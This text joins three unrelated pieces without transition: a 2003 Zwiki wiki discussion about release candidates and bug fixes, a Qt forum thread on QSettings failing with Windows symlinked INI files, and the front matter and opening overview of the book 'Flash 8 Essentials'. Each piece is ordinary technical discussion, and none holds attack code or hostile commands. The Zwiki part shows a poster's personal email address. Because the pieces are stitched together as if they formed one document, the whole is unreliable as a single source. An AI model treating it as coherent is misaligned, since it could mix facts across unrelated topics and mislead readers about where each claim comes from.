mbcs error: Casey Duncan, the author, says this may be due to a missing dependancy in the windoze .exe version. he will be looking into it, but his workaround of using the source distribution got things working for me (w/ a small hack).
editform.pt --Simon Michael, Wed, 24 Sep 2003 16:56:30 -0700 reply
It didn't work. :)
How can I mirror? --DeanGoodmanson, Thu, 25 Sep 2003 07:25:47 -0700 reply
another possibility:
re: couple of ?s --Simon Michael, Thu, 25 Sep 2003 09:58:49 -0700 reply
I'd guess regulations pay attention to the authenticated zope owner, only. So it may be that they don't work propertly in anonymous-accessible wikis.
The advantage of regulations was that any user could set fine-grained policy within a single large wiki, without having to go to the ZMI. They were used on the old zope.org. But IMHO they made things so complicated that users went elsewhere.
1.0 discussion --Simon Michael, Thu, 25 Sep 2003 16:42:16 -0700 reply
I just posted this over on ZwikiOneReleaseDiscussion, and I guess that page is the place to continue this thread. Comments welcome.
All going well, the november release will mark the five year anniversary of the first Zwiki release. Though ZwikiInternationalization? has not yet happened to the degree I intended - it needs someone to take it by the scruff of the neck - five years is long enough.
I've updated SimonsPlan2004 with some tentative plans for (gasp) 1.0. This includes the things I can think of right now that seem important for 1.0. I think Nov 1 is too soon for 1.0, but it just may be the right time to call it 1.0 alpha. I think we need a feature freeze for at least one solid month after that, preferably two, before 1.0 (may be hard).
0.23rc1 released --simon, Thu, 25 Sep 2003 22:05:04 -0700 reply
or is it an alpha...
ReleaseNotes are not done, please see ChangeLog? for now.
cookie problems w/ redirects --dan mcmullen, Fri, 26 Sep 2003 15:38:10 -0700 reply
anyone else had problems w/ ZWiki setting cookies when using external redirects?
i'm using (windoze) Apache to redirect requests like to which a Zope virtualHostMonster translates to
the problem i'm seeing is that when UserOptions? tries to set cookies (for either full/simple/minimal or user prefs) only one or two of the cookies are actually set.
i put some prints in UserFolder? to confirm that all the cookies were getting into the RESPONSE. other than that, i'm stumped.
tia, dan
cookie problems w/ redirects --Simon Michael, Fri, 26 Sep 2003 18:24:58 -0700 reply
Hi Dan.. printing stuff in UserOptions? is a good idea. As it happens I have just been debugging a problem there, I used dtml-var REQUEST and some printouts where it sets cookies.
FWIW my problem was this: I was running UserOptions? inside a plone site for the first time, and in this case it turns out for some reason that dtml code's namespace does not include the contents of REQUEST. So I had to add a dtml-with REQUEST around the whole lot.
0.23rc2 released --SimonMichael, Fri, 26 Sep 2003 21:07:27 -0700 reply
with ReleaseNotes. "Permission renames, useful page/catalog/tracker setup methods, more functional default skin, expensive but nifty hierarchy navigation options, miscellaneous bugfixes."
help helping --dan mcmullen, Sat, 27 Sep 2003 16:53:14 -0700 reply
as a newcomer to this community, i'm at a bit of a loss how best to help w/ the 0.23 release.
i've installed rc2. (on top of my existing, backed up, data - is this safe? :-) i'll report problems from my present use of ZWiki as a personal data repository. (what's the best way to do that? the tracker?)
i could just go bug hunting & probably turn up some some odd corner cases, but do we need more of that for this release? any particular areas of functionality that could use some exercise?
i could also do some bug squashing if someone pointed me at a few that would be good to fix, but i'm unsure which are worth the effort at this stage.
i have a patch or two i've made to the 0.22 codebase that i will be integrating into 0.23 asap. should i wait to suggest those til after 0.23 is released?
is general feedback on the design and user interface of 0.23 useful at this point? where should that go?
suggestions?
tia, dan
help helping --SimonMichael, Sat, 27 Sep 2003 19:39:28 -0700 reply
Thanks Dan, I like to see this question :)
Quick answers: yes it's generally very safe to upgrade zwiki. There has never been a case of data loss due to upgrade, as far as I know. Of course the recommendation is to always backup anyway.
The tracker is the right place for issues - if you're unsure of it's nature or want some help characterising it, post here first.
I'm not looking for new bugs before this release, just hoping we catch any obvious breakage or regressions. We do need a serious bug squash effort, but during a full month (see SimonsPlan2004). I don't have any specific shaky feelings about 0.23's new stuff (ReleaseNotes) - I've seen the setup methods work in a plone site, I've had a good look at the hierarchy code in action here - so I would say test whatever there looks interesting to you or is something you depend on.
But any bug squashing, any time, is very welcome. Use FilterIssues to narrow down the open issues - I did a pass through these last night and closed about ten (the easy ones :). Patches too - post these somewhere on the wiki, in the tracker, or here. Design & UI feedback - sure, this is the place.
If you're able to help with the unit tests or any automated testing, that is very effective. One thing I think we should do is convert the unit tests to use ZopeTestCase?, as the latest ones do..
In short, lots of opportunities. I hope one or more of these catches your interest.
help helping --SimonMichael, Sat, 27 Sep 2003 19:49:58 -0700 reply
Releases are made on their own CVS branch, by the way, so in principle we should be able to handle continuous full-speed development on the trunk.
See also the projects list on ZwikiDevelopment?.
help helping --SimonMichael, Sat, 27 Sep 2003 20:01:04 -0700 reply
I guess we do need some more testing on the setup methods. Eg setupPages, with a single page, with existing pages, in plain wikis and CMF wikis.
permission fix --simon, Sat, 27 Sep 2003 20:14:31 -0700 reply
The skins were using the old add comment permission, fixed in cvs.
0.23rc2 released -- Sun, 28 Sep 2003 10:06:58 -0700 reply
setupPages method does not parse optional parents list(#parents:) ?
RecentChanges? glitch? --dan mcmullen, Sun, 28 Sep 2003 12:54:22 -0700 reply
in RecentChanges?, my ZWiki ends up getting the modification date from the line:
<dtml-var bobobase_modification_time
this ends up fetching the modification date of the Catalog's brain object at the top of the dtml stack, instead of the WikiPage? as desired.
my fix is to wrap the logic to fetch the modification date with:
<dtml-with "_.getitem('sequence-item').getObject()"> ... </dtml-with>
this puts the WikiPage? itself on the top of the stack, & bobobase_modification_time returns it's date as desired.
is there some reason the attempts to fetch
lastEditTime() are failing on my ZWiki?
should i make an "official" patch in ZwikiIssueTracker for this?
also, to these novice eyes it looks like
lastEditTime.toZone( and
bobobase_modification_time.toZone( should have '()
before the .'. am i missing something? (if so, then there's an extra
() in the similar brute force code later on.)
also, is there a reason that an extra blank line is being inserted after every change line (w/ summaries off)?
best, dan
RecentChanges? glitch? --simon, Sun, 28 Sep 2003 15:59:49 -0700 reply
is there some reason the attempts to fetch lastEditTime() are failing on my ZWiki?
Yes (he said helpfully :).
Perhaps remove all that try..except malarkey to find out more. We should never be falling back on bobobase_modification_time these days. What's supposed to happen is RC calls pages, which returns "brains" - genuine catalog brains or pseudo PageBrains? - which should have a lastEditTime attribute. Perhaps you have a catalog installed, but without the lastEditTime metadata field ? setupCatalog should fix this.
Modern RC uses these brain objects (containing only small metadata) and tries to avoid loading the actual page objects, to reduce zodb activity and memory usage. Brain objects stores things like lastEditTime and bobobase_modification_time as simple attributes. Hope this makes things clearer.
I left the blank line in the latest RC layout because it seemed to help make the thing more regular and readable when page names are different lengths, some have notes and some don't, etc. I do sometimes miss the more compact display.
0.23rc2 released --simon, Sun, 28 Sep 2003 16:12:09 -0700 reply
Thanks! Fixed in cvs.
RecentChanges? glitch? --dan mcmullen, Sun, 28 Sep 2003 16:32:39 -0700 reply
the exception that lastEditTime() generates is:
RuntimeError, function attributes not accessible in restricted mode
any clue what this means? (probably another misconfiguration on my end. :-(
RecentChanges? glitch? --simon, Sun, 28 Sep 2003 16:34:26 -0700 reply
No. Try setupCatalog ?
RecentChanges? glitch? --dan mcmullen, Sun, 28 Sep 2003 16:35:17 -0700 reply
oh yeah: i checked & there is a lastEditTime field in my catalog.
(commenting too quickly. time to stop hacking. :-|
RecentChanges? glitch? --simon, Sun, 28 Sep 2003 16:35:42 -0700 reply
Also maybe brackets you added ? Be sure to use the latest standard RecentChanges? code.
0.23rc3 released --simon, Sun, 28 Sep 2003 16:40:38 -0700 reply
Gets like chat, doesn't it :)
Zwiki 0.23rc3 2003-09-28
- disable regulations, permanently
- set parents when installing default pages
- update catalog after subscribing/unsubscribing (fixes non-updating "other page subscriptions")
- use renamed add comments permission in skins
- make post-delete redirect work when the parent is freeform-named
- fix some cases where the current page was not highlighted if the name contained punctuation
- make the midsection marker (use for subtopics) a little more robust
new linking code --simon, Sun, 28 Sep 2003 19:51:10 -0700 reply
I'm testing the next step in linking optimization (all pages* methods return brains, so renderLink doesn't need to hit the zodb). Shout if you find breakage around zwiki.org.
0.23rc3 released -- Mon, 29 Sep 2003 00:40:51 -0700 reply
Without ZCatalog,SearchPage always hits all Pages. Bug?
RecentChanges? glitch? --dan mcmullen, Mon, 29 Sep 2003 09:45:28 -0700 reply
simon wrote: >>>Be sure to use the latest standard RecentChanges? code<<<
oh foo! latest RecentChanges? fixes things.
(so far: 1 problem already found; 1 false alarm; 1 operator error: guess this is a "learning experience" :-)
so, to completely upgrade an existing ZWiki:
- replace Products/ZWiki folder
- click "Refresh this product" on the ZWiki product page/Refresh tab
- copy customized standard pages/dtml someplace
- invoke SomePage?/setupPages
- invoke SomePage?/setupDtmlMethods
- invoke SomePage?/setupCatalog
- merge customizations into new standard pages/dtml
- invoke SomePage?/upgradeAll
did i miss anything?
simon also wrote: >>>Gets like chat, doesn't it :)<<<
would be nice if there were some way to mark a comment as "transient" so that it would disappear after a period of time (unless someone edits it to "persistent").
and simon wrote earlier: >>>I do sometimes miss the more compact [RecentChanges] display.<<<
any possibility of a finer grained preferences mechanism? it's unfortunate to have to make choices like this absolute. maybe a UserNamePreferences? page could be scanned automagically?
also, the trailing WikiName problem that is fixed for StructuredText pages still exists in WikiWikiMarkup? pages. (you probably know this. :-)
best, dan
Localization -- Mon, 29 Sep 2003 12:02:53 -0700 reply
If possible, please move the words "next", "previous" and "up" defined in navlinks() of Parents.py to the skin wikipage.pt. Then localization will be easy. (0.23.0rc3)
external edit nit --DanMcmullen, Mon, 29 Sep 2003 17:26:33 -0700 reply
if i use an external editor to modify a page and (inadvertantly) remove the blank line after the "Log:" header i get:
- Module ZPublisher?.Publish, line 98, in publish
- Module ZPublisher?.mapply, line 88, in mapply
- Module ZPublisher?.Publish, line 39, in call_object
- Module Products.ZWiki.ZWikiPage, line 1980, in PUT
- Module Products.ZWiki.Utils, line 564, in parseHeadersBody
NameError?: global name
lstrip is not defined
fyi: midsection marker visible --DanMcmullen, Tue, 30 Sep 2003 09:42:19 -0700 reply as of tuesday am
fyi: midsection marker visible --Simon Michael, Tue, 30 Sep 2003 10:06:37 -0700 reply
Dan, all, thanks for your investigations and reports.
Note you'll see "zwikimidsection" glitches all over, most or all of these are pages that were rendered with earlier code. Visiting /clearCache or hitting alt-W should fix it. Or I could upgradeAll but that would tie up the site for half an hour.
I'm mostly offline this week - will look at these other things when I can, and possibly hold off the release till I get back if it seems necessary.
running upgradeAll --SimonMichael, Tue, 30 Sep 2003 11:08:10 -0700 reply
site will be slow for a bit
felt like hacking some code today... --DanMcmullen, Tue, 30 Sep 2003 21:23:09 -0700 reply
...so tried out one way of removing HTML from Parents.py, inspired by Simon's comment wondering if this would be possible. anyone interested can take a look at the extremely fresh results at RenderNestingX. feedback appreciated. (it includes the option of displaying the page ancestry header as one line of page names separated by "::".)
... -- Sat, 22 Nov 2003 02:45:28 -0800 reply
i designed a plone site.i have one problem site header has included buttons ie,labournews,archives etc.. i want to click on labour news diplay the contents of this folder will display plone default format.i want dispay this things and every folder contents display same user defined format not display plone defined format how can i solve this problem pls give me solution to me this adddr:sajumaryjoseph@yahoo.com | http://zwiki.org/GeneralDiscussion200309?subject=security&in_reply_to=%3C20030917161314-0700%40zwiki.org%3E | CC-MAIN-2019-26 | en | refinedweb |
QSettings problem when input file is a link
Hi, i'm having problems loading settings with QSettings on a windows machine.
I have a symlink file in the Project/debug folder that points to another file in another folder (writable and readable) when I try to read some setting from that file it behave like the file doesn't exists, when I try to write some settings on that link it overwrites the entire file deleting all the settings in it.
The link file is a symlink, not a normal shortcut (that doesn't work either, the same behavior is triggered) is created with the windows tool mklink
main.cpp:
#include <QGuiApplication> #include <QQmlApplicationEngine> #include <QSettings> #include <Qdir> #include <QCoreApplication> int main(int argc, char *argv[]) { QGuiApplication app(argc, argv); QQmlApplicationEngine engine; engine.load(QUrl(QStringLiteral("qrc:/main.qml"))); if (engine.rootObjects().isEmpty()) return -1; qInfo(QString(QCoreApplication::applicationDirPath()+"/test.ini").toLatin1().data()); QSettings* _persisted_repository = new QSettings(QCoreApplication::applicationDirPath()+"/test.ini", QSettings::IniFormat); _persisted_repository->setValue("aa","false"); //_persisted_repository->setValue("bb","false"); _persisted_repository->setValue("cc","false"); qInfo(_persisted_repository->value("bb").toString().toLatin1().data()); _persisted_repository->sync(); return app.exec(); }
even if the setting "bb=false" is originally in the file it disappear and this line has a null output in the console:
qInfo(_persisted_repository->value("bb").toString().toLatin1().data());
P.S: this behavior is not triggered with a file that is not a link or a simlink, the same code with "test.ini" as a normal file works fine
a link should be something like "test.ini.lnk". Maybe you just have some confusion with the file names, due to the fact that WINDOWS by default does not show the ".lnk" extension in the explorer.
-Michael.
@m.sue
Hi, the mklink windows tools makes file system level links. it is not .lnk files.
Its similar to the ones seen on linux.
@m-sue I tried that too but I got the same behavior and @mrjj is correct, it's not a ".lnk" file. Thanks :)
@damre22
Im a bit surprised the symbolic link dont work.
Most programs sees the actual file and have no awareness of
of the link.
Did you try both types (symbolic and hard link ) ?
@mrjj sadly the file i need to reference is on another partition so my only option is symlink, I cannot use hard link between different drives
@damre22
ah, i forgot that limitation.
Have you tried with QFile and see if that will read correctly via the link?
It might be a deeper issue that QSettings.
@mrjj said in QSettings problem when input file is a link:
Have you tried with QFile and see if that will read correctly via the link?
Yes I tried, the file is not even considered a link.
QFile file("test.ini"); qInfo(file.symLinkTarget().toLatin1().data());
returns a null string but is binded to the correct file. However i think this is correct because that file technically is not a link
It might be a deeper issue that QSettings.
I think I can agree on that
Ok
it seems that symbolic links are not considered for symLinkTarget()
as docs says
"Returns the absolute path of the file or directory a symlink (or shortcut on Windows) points to"
So it sounds like only .lnk is handled/known
Just to be sure i understand your setup.
In the build folder/deploy you have test.ini link to the real
file on other partition?
And using that with QSettings do odd things where as same code with
real file directly in place, just works?
@mrjj said in QSettings problem when input file is a link:
In the build folder/deploy you have test.ini link to the real
file on other partition?
Exaclty
And using that with QSettings do odd things where as same code with
real file directly in place, just works?
yes, with the real file the same code works fine, by the way I opened a bug on bugreports.qt.io
because I think this is a problem with QSettings
- kshegunov Qt Champions 2017
Check if a regular file
QFilecan be opened, read and written when it's a symlink. If that is okay, then the problem is with
QSettings, if not probably the problem is with the underlying file system('s API/integration).
@damre22
Good i was about to suggest that since it seems reproducible in small sample and
it sounds like you tested its not just a "user" error.
Could you perhaps, show the mklink commandline you used in the bug report for
completeness. ?
@kshegunov I will check that too and I will update the bug report if I find something new, thank you
Hi,
I also had a
QSettings::AccessErrorwhen trying to
QSettings::sync()on a config.ini file on file system ext4 + symlink with Qt 5.7.1 on raspbian OS Stretch
Here is my snipet to reproduce locally:
mysettings->sync(); QSettings::Status s = mysettings->status(); QString msg; switch(s) { case QSettings::NoError: msg = "No error occurred"; break; case QSettings::AccessError: msg = "An access error occurred (e.g. trying to write to a read-only file)."; break; case QSettings::FormatError: msg = "A format error occurred (e.g. loading a malformed INI file)."; break; } qDebug() << "writing configuration_file" << mysettings->fileName() << "status:" << msg << endl;
In my debug output I get:
2019-04-01 12:08:53 : writing configuration_file "/home/pi/config.ini" status: "An access error occurred (e.g. trying to write to a read-only file)."
and the file
pi@machine:~ $ ls -l config.ini lrwxrwxrwx 1 pi pi 28 avril 1 12:08 config.ini -> /etc/config/config.ini
the file is actually perfectly writable by
piusers
pi@machine:~ $ ls -l /etc/config/config.ini -rw-r--r-- 1 pi pi 829 avril 1 12:08 /etc/config/config.ini
Is it fixed in newer version of Qt?
The idea behind using symlink, is a backward compatible path, + using etckeeper in
/etc/
A suggestion for work around?
Regards,
Sylvain.
Replying to myself:
The bugrepport said is is fixed for 5.10.1
And it can be made to work with correct folder permissions :
$ ls -ld /etc/config/ drwxr-xr-x 2 root root 4096 avril 1 11:15 /etc/config/ $ sudo chgrp pi /etc/config/ $ sudo chmod g+w /etc/config/ $ ls -ld /etc/cleandrop/ drwxrwxr-x 2 root pi 4096 avril 1 11:15 /etc/config/
resolving simlink doesn't helps
// resolve symlink // QFileInfo info(_configuration_file); if (info.isSymLink()) _configuration_file = info.symLinkTarget();
So I removed this fix, and fixed the folder permission and it worked. | https://forum.qt.io/topic/84614/qsettings-problem-when-input-file-is-a-link/5 | CC-MAIN-2019-26 | en | refinedweb |
[image: ]
[image: ]
[image: ]
[image: Next Section]
[image: ]
[bookmark: b243-76E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Flash 8 Essentials
Paul Barnes-Hoggett
Stephen Downs
Glen Rhodes
Craig Swann
Matt Voerman
Todd Yard
[image: Image from book]
[bookmark: 4][bookmark: IDX-ii6E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Flash 8 Essentials
Copyright © 2006 by Paul Barnes-Hoggett, Stephen Downs, Glen Rhodes, Craig Swann, Matt Voerman, Todd Yard
reproduced or transmitted in any form or by any means, electronic or
mechanical, including photocopying, recording, or by any information
storage or retrieval system, without the prior written permission of
the copyright owner and the publisher.
ISBN (pbk): 1-59059-532-7
Printed and bound in the United States of America
9 8 7 6 5 4 3 2 1 2560 Ninth Street, Suite 219, Berkeley, CA 94710. freely available to readers at in the Downloads section.
Credits
Additional Material
Chris Mills
Lead Editor
Chris Mills
Technical Reviewer
Marco Casario Editors
Damon Larson, Julie Smith, Nicole LeClerc
Assistant Production Director
Kari Brooks-Copony
Production Editor
Katie Stence
Compositors
Dina Quan and
Van Winkle Design Group
Proofreader
Elizabeth Berry
Indexer
Lucie Haskins
Artist
April Milne
Interior and Cover Designer
Kurt Krames
Manufacturing Director
Tom Debolski[bookmark: 5][bookmark: IDX-iii6E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
Dedicated to Fitz: "Up the Revolution!"
Paul Barnes-Hoggett
To Audrey, my little upgrade essential.
Todd Yard
To my loving and supportive family who I thank for
providing me with a positive and nurturing childhood full of
encouragement to explore and discover where my passion lies.
Craig Swann
[bookmark: 6][bookmark: IDX-iv6E565C1E-70B7-44D0-82B7-BC4CDC351AB9][bookmark: 7][bookmark: IDX-v6E565C1E-70B7-44D0-82B7-BC4CDC351AB9][bookmark: 8][bookmark: IDX-vi6E565C1E-70B7-44D0-82B7-BC4CDC351AB9][bookmark: 9][bookmark: IDX-vii6E565C1E-70B7-44D0-82B7-BC4CDC351AB9][bookmark: 10][bookmark: IDX-viii6E565C1E-70B7-44D0-82B7-BC4CDC351AB9][bookmark: 11][bookmark: IDX-ix6E565C1E-70B7-44D0-82B7-BC4CDC351AB9][bookmark: 12][bookmark: IDX-x6E565C1E-70B7-44D0-82B7-BC4CDC351AB9][bookmark: 13][bookmark: IDX-xi6E565C1E-70B7-44D0-82B7-BC4CDC351AB9][bookmark: 14][bookmark: IDX-xii6E565C1E-70B7-44D0-82B7-BC4CDC351AB9][bookmark: 15][bookmark: IDX-xiii6E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
About the Authors
After studying architecture for seven years, Paul Barnes-Hoggett
changed his mind and decided to spend his time designing the
"intergoogle." He spent time as a lead developer at boxnewmedia, where
he built award-winning sites for clients such as Select Model
Management. (In his own words, he admits, "It's a tough job looking at
pictures of beautiful people all day, but someone has to do it.")
He set up Eyefodder in 2003, which specializes in
building rich Internet applications for the media industry, and has
built solutions for clients including FHM, Adidas, Air Miles, and ITV.
When not pushing pixels, Paul likes to eat, drink, and be merry. To get
in contact with Paul, visit.
Stephen Downs, aka Tink, has been a freelance Flash
designer/developer for the past four years, and has a background in
art, design, and photography. Based in London, England, he works on a
wide range of projects, both for other companies and his own clients.
The growth in his workload has recently lead to the startup of his own
company, Tink Ltd. His primary focus is user interaction and
interactive motion, which includes integrating design and development
to any design specification using best practice methodologies. For
contact info and work examples, visit. For Tink's daily thoughts, visit.
Glen Rhodes is the CTO of CRASH!MEDIA, located in
Toronto, Canada. He's also a Flash game developer and has authored over
ten books, including Macromedia Flash MX 2004 Game Development, Flash MX 2004 Games Most Wanted, and Flash MX Designer's ActionScript Reference. He's also a regular writer for several computer magazines, including Web Designer and Practical Web Projects.
Glen has developed dozens of games for many platforms, including
Windows PC, PlayStation, and these days, Macromedia Flash. He has
developed many Flash games, including The Black Knight for Arcade Town, Domino Dementia at, and "W.R.A.X." at. He's the founder of, and currently runs this Flash game development community website. Glen's website is.
In addition to his Flash work, Glen also writes and records music with Canadian singer-songwriter Lisa Angela (). Together, their music has had much success, including regular air play on the Oprah Winfrey Show.
[bookmark: 16][bookmark: IDX-xiv6E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
Craig Swann is founder of the award winning interactive agency CRASH!MEDIA (crashmedia.com).
Craig has been working in the online space since 1995 and has been a
core part of the Flash community since it's inception. As an educator,
curator, speaker and writer of new media technologies Craig has given
20 International talks on Flash, written and contributed to 7 Flash
books and currated over a dozen new media events featuring some of the
world's brightest Flash and interactive developers. His flash work at
CRASH! has received over a dozen awards and has been featured in both
print and television. Craig's interactive audio work has developed into
the multi-award winning online music application Looplabs.com
which has been used by such clients as Coca-Cola, Miller, Bacardi,
Calvin Klein, Toyota, Sony and others. When not plugged into the
matrix, Craig enjoys travelling the world and questioning everything.
Certified Macromedia master instructor, Team
Macromedia member, internationally published author, and active
Flash/Flex community participant, Matt Voerman has
been using Flash since its inception as Future Splash. He has over ten
years professional web and multimedia industry experience, and has
worked with national digital marketing agencies, state government
departments, and international finance sector clients. Based out of
Perth, Australia, Matt has worked with Macromedia on a number of
levels, most recently as a subject matter expert (SME), helping to
develop the official Macromedia Flash Developer Certification Exam.
Todd Yard is currently a Flash developer at
Brightcove in Cambridge, Massachusetts, where he moved early in 2005 in
the middle of a blizzard. Previously, he was in New York City, working
with EGO7 on its Flash content management system and community
software. He has contributed to a number of friends of ED books, of
which his favorites were Flash MX Studio and Flash MX Application and Interface Design, though he feels the most useful was Extending Flash MX 2004: Complete Guide and Reference to JavaScript Flash. His personal site (which he used to update all the time, he fondly remembers) is.
[bookmark: 17][bookmark: IDX-xv6E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
About the Technical Reviewer
Marco Casario is currently one of the most dynamic
developers in the Macromedia world. A Certified Flex Instructor and
Certified Flash and Dreamweaver Professional, he collaborates with
Macromedia Italy as a speaker and promoter for several events and
conferences, in addition to developing challenging rich Internet
applications himself.
A Flash Lite evangelist, he has also founded a Flash Lite Yahoo Group () and often deals with this new mobile technology on his blog pages at.
Marco recently founded Comtaste (), a company dedicated to exploring new frontiers in the rich Internet and mobile applications fields.
[image: ]
[image: Next Section]
[image: ]
[image: ] [image: ] [image: ] [image: ]
[image: ] [image: ]
[image: ]
[image: ]
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[bookmark: intro6E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 20][bookmark: IDX-xvii6E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Introduction
[bookmark: 21][bookmark: b2495-296E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Overview
Hello, and welcome to Flash 8 Essentials,
the result of a collaboration between friends of ED and some of the
most talented Flash developers in the world today. It's been a long,
hard road getting here, but we've done it, and we're very proud of our
creation. We designed this book to serve a number of purposes. It's an
essential guide to all of the great new features available in Flash 8,
it's a reference guide for you to look up all those fiddly details, and
it's also a gallery of inspirational examples to help you go further in
your work, allowing you to create more beautiful, breathtaking designs
and more usable applications.
As you've no doubt realized if you've started to
experiment with Flash 8, Flash has come a very long way since the days
of Flash 3 and 4. Some of you will remember even earlier than that.
(Remember what Flash was like before ActionScript? OK, let's not go
there …)
This book is broken down into ten chapters and an
appendix. Each chapter deals with a different new area of Flash 8,
getting you up to speed as quickly as possible with the new features,
using a combination of easy-to-follow tutorials, reference material,
and inspirational examples. The appendix is a gallery of
fully-functional examples—some of the stuff is touched upon in previous
chapters, and some isn't. The chapters are as follows:
In Chapter 1,
Matt Voerman introduces you to the world of Flash 8, summarizing the
new features and setting the scene nicely for the rest of the book.
Chapter 2
sees Craig Swann and Glen Rhodes playing with blend modes—blending
movie clips together for some exciting graphical effects, the likes of
which were previously only available in graphics packages like
Photoshop.
Chapter 3
sees Craig and Glen again take the helm, looking at the all-new filter
effects, another set of functionality that has been borrowed from
graphics packages. Filters allow you to apply effects such as drop
shadows to text or movie clips easily— what previously required a lot
of hard work can now be achieved with a few clicks on the Flash
interface. And there's much more to discover than that, of course.
Todd Yard looks at Flash 8 drawing improvements in Chapter 4, covering Object Drawing mode, gradient enhancements, and much more.
In Chapter 5,
Craig and Glen are back to give you the lowdown on the exciting
advances made with video in Flash 8, all thanks to the new On2 VP6
codec. Coverage includes some exciting ActionScript video manipulation,
and a great game that makes use of the new video alpha channel!
[bookmark: 22][bookmark: IDX-xviii6E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
Matt returns to the scene in Chapter 6 to explore Flash 8's TextField improvements, including smoother text using Saffron and text anti-aliasing using both the IDE and ActionScript classes.
In Chapter 7,
friends of ED's very own Chris Mills demonstrates the new Flash 8
performance-enhancing features, including bitmap caching and the Show
Redraw Regions option.
Chapter 8 is the domain of Paul Barnes-Hoggett, who dives deep into the exciting new BitmapData API. He shows you how all the important methods work before following up with some exciting applied examples.
Chapter 9
sees Todd return to present some of his amazing work with the new Flash
8 features—getting creative with filters, masks, and animation. Some of
the effects presented here are easier to achieve using Flash 8 than
previous versions; some were nearly impossible in previous versions!
In Chapter 10, as you get close to the crescendo of the book, Craig and Glen give you an introduction to the ExternalInterface
API, which allows your SWFs to easily and effectively communicate with
host applications written in Java, C#, etc., for some interesting
advanced application development techniques.
Last but certainly not least, Stephen Downs (aka Tink) presents a gallery of inspirational examples in the Appendix, which includes a few features not covered in the rest of the book, such as the FileReference object. He also revisits a plethora of examples introduced earlier, with breathtaking results.
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[image: ] [image: ] [image: ] [image: ]
[image: ] [image: ]
[image: ]
[image: ]
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[bookmark: intro6E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 23][bookmark: introlev1sec16E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Who this Book is for
Simple—this book is for anyone with previous
experience in Flash who wants to get up to speed with the new features
introduced in Flash 8 as soon as possible. We won't waste time looking
at timeline basics and tweens, as we think it will be insulting to your
intelligence. We know how anxious you must be to further your knowledge
with a minimum of time investment and get back to your work, fully
harnessing the power of Flash 8. These are busy times for Flash-using
professionals.
[bookmark: 24][bookmark: introlev2sec16E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Do I Need to have Flash 8?
In a word, yes. This book won't be much use to
you if you haven't upgraded to Flash 8. If you want to buy this book as
a guide and check out the new features of Flash 8 before you decide to
make that investment, you can always download a 30-day trial version
from.
We would also recommend going for Flash 8 Professional rather than
Flash 8 Basic. While Basic is still a competent product, you'll be
missing out on some of the amazing new features that are only available
in Professional—video alpha channel support, the stand-alone video
encoder, blend modes, and filters, to name just a few. Go to for more information about the new features and their availability in the different versions.
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[image: ] [image: ] [image: ] [image: ]
[image: ] [image: ]
[image: ]
[image: ]
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[bookmark: INTRO]
[bookmark: 25][bookmark: INTROLEV1SEC2]Support for this Book
[bookmark: 26][bookmark: IDX-XIX6E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
All the necessary files for this book can be downloaded from. If you run into a problem with any of the instructions, check the errata page for this book at, or post a question in the friends of ED forum at,
and we'll try to help you as quickly as possible. If you post to the
forum, please be as precise as you can about the nature of the problem.
We've made our very best efforts to ensure that all of the content
presented in this book is error free, but mistakes do occasionally slip
through— it's just a sad fact of life. We do apologize in advance for
any you find.
[bookmark: 27][bookmark: IDX-XX6E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[image: ] [image: ] [image: ] [image: ]
[image: ] [image: ]
[image: ]
[image: ]
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[bookmark: ch016E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
Chapter 1: Flash 8 Overview
[bookmark: 29][bookmark: IDX-16E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
by Matt Voerman
[bookmark: 30][bookmark: N39836E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 31][bookmark: ch01lev1sec16E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Overview
From little things, big things grow. When John
Gay and Robert Tatsumi first developed their computer-illustration tool
SmartSketch back in 1993, they never imagined that 12 years and eight
versions later their humble application would be the tool of choice of
over 1 million rich-media developers worldwide.
SmartSketch went on to be known as FutureSplash, until
its parent company (FutureWave) was bought out by Macromedia in 1996.
Macromedia then changed FutureSplash's name to Flash. Fast-forward to
April 2005, and Adobe Systems announces its intention to purchase
Macromedia in a deal valued at $3.4 billion. Flash, and its global
ubiquity, was one of the main motivators behind Adobe's acquisition of
Macromedia.
Code-named 8Ball during its development phase,
Macromedia Flash 8 has now evolved into the industry standard for
creating (and delivering) web-based rich-media content and applications.
Flash 8 contains a plethora of new features and
functionality, with a large portion of them targeted squarely toward
web designers and animators, as well as video and interactive media
professionals. That's not to say that rich Internet application
developers have been left out in the cold. With its new lightweight,
cross-platform runtime and mobile device authoring features, the Flash
Platform () is still the ideal choice for the development of rich enterprise and mobile: 32][bookmark: ch01lev1sec26E565C1E-70B7-44D0-82B7-BC4CDC351AB9]What's New in Both Versions of Flash 8
In 2004, Macromedia took the step of splitting
Flash into two distinct versions to cater for their wide designer and
developer audience. Flash 8 continues this tradition by creating a
clearer distinction between the two versions with the release of Flash
Basic 8 and Flash Professional 8.
Flash Basic 8 is ideal for web and new-media designers
who have elementary requirements with regard to importing and
manipulating various types of media. Flash Basic 8 designers still gain
access to all of Flash's foundation functionality (including several
new workspace enhancements), but not some of the newer power features
of the latest release.
For designers and developers looking to utilize the
majority of the new feature sets of Flash 8, Flash Professional 8 is
the preferred option. Flash Professional 8 offers a substantial number
of features not found in its sibling's version, such as graphics effect
filters, alpha channel video support, and custom text anti-aliasing.
The following pages outline the new features available in both versions of Flash 8.
